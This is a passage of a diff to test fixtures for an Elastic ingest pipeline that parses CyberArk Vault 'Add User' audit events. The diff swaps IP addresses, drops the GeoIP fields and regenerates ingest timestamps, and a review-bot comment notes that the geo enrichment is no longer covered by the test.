09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -417,19 +357,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -449,7 +378,7 @@ "PSMApp_ASR-WIN" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -457,7 +386,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:06Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add User", "source_user": "PSMApp_ASR-WIN", "message": "Add User", 
@@ -471,8 +400,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586629Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830937800Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -498,19 +427,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -530,7 +448,7 @@ "PSMGw_ASR-WIN" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -538,7 +456,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:15Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add User", "source_user": "PSMGw_ASR-WIN", "message": "Add User", 
@@ -552,8 +470,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586632600Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830943200Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -579,20 +497,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -612,7 +518,7 @@ "PSMPApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -620,8 +526,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:36Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPApp_VAGRANT", "message": "Add User", 
@@ -635,8 +541,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586636200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830948700Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add 
User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -662,20 +568,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -695,7 +589,7 @@ "PSMPGW_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -703,8 +597,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:36Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPGW_VAGRANT", "message": "Add User", 
@@ -718,8 +612,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586639700Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830954Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add 
User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -745,17 +639,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -775,7 +660,7 @@ "PSMPGW_SSH" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
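Review bot: The `source.geo` object disappears from the expected document in the `@@ -745,17 +639,8 @@` hunk, so the pipeline's GeoIP enrichment of `source.ip` is no longer asserted by this test. If the 67.43.156.0/24 addresses have no entry in the test GeoIP database that is an expected side effect of moving to the supported subset, but then no event in this file still exercises the geo path, and a regression in the geoip processor would go unnoticed; consider keeping at least one event on an address from the supported subset that does resolve to a geo record. The same removal appears in the `@@ -825,17 +710,8 @@` and `@@ -905,17 +781,8 @@` hunks and in the test-181 and test-185 expected files further down. The regenerated `event.ingested` values are run-specific; if the pipeline test config does not already treat `event.ingested` as a dynamic field, every regeneration will keep rewriting them and inflating diffs like this one.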
@@ -783,8 +668,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPGW_SSH", "message": "Add User", 
